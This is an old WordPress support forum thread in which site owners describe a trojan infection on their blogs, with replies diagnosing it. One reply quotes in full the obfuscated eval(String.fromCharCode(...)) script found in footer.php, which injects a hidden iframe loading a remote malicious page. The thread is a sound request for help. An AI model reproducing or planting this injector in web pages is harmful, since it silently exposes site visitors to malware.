WordPress.org

Ready to get started?Download WordPress

Forums

My Site has been infiltrated by a virus/trojan (4 posts)

  1. killion
    Member
    Posted 5 years ago #

    Hi

    I am having problems with my site: http://www.boidus.co.uk/
    I have been receiving reports from users about a virus/trojan from my site infecting their systems. I am not sure how this can be since I upgraded to WP 2.7.1
    Is there a way I can scan my files for viruses and remove the weak link to my site?
    Please take a look here (be careful)
    http://www.boidus.co.uk/
    and HELP.
    I don't want to upset my readers more.
    Thanks

    Killion

  2. Chandesh Parekh
    Member
    Posted 5 years ago #

    Hi Killion,

    any resolution to the problem?

    I found a line of code at the bottom of index.php which generates an iframe and it's from there that the trojan is being served. I deleted the code but it was back a few days later.

    C.

  3. mores
    Member
    Posted 5 years ago #

    Being a mac user, I death-defyingly clicked on your link and ignored the security warning I got from safari.

    Yes, you have some weird bit of javascript in your footer
    <script type="text/javascript">eval(String.fromCharCode(118,97,114,32,102,103,103,103,101,51,61,34,118,101,115,34,59,118,97,114,32,119,51,52,53,61,34,116,101,34,59,118,97,114,32,114,101,54,61,34,108,105,97,46,34,59,118,97,114,32,114,114,61,34,99,111,109,34,59,118,97,114,32,97,61,34,105,102,34,59,118,97,114,32,115,61,34,116,116,34,59,100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,39,60,39,43,97,43,39,114,97,109,101,32,115,114,99,61,34,104,39,43,115,43,39,112,58,47,47,39,43,102,103,103,103,101,51,43,39,39,43,119,51,52,53,43,39,39,43,114,101,54,43,39,39,43,114,114,43,39,47,39,43,39,113,113,112,47,39,43,39,39,43,39,39,43,39,34,32,115,116,121,108,101,61,34,100,39,43,39,105,115,112,108,97,121,58,110,39,43,39,111,110,101,34,62,60,47,105,102,39,43,39,114,97,109,101,62,39,41,59,118,97,114,32,116,61,48,48,48,48,49,50,49,55))</script>

    Check your footer.php. It's even after the closing html tag.

  4. pastebin
    Member
    Posted 5 years ago #

    I got the same problem... can't seem to find a fix for it...
    It infects all my wordpress blogs....

Topic Closed

This topic has been closed to new replies.

About this Topic

Tags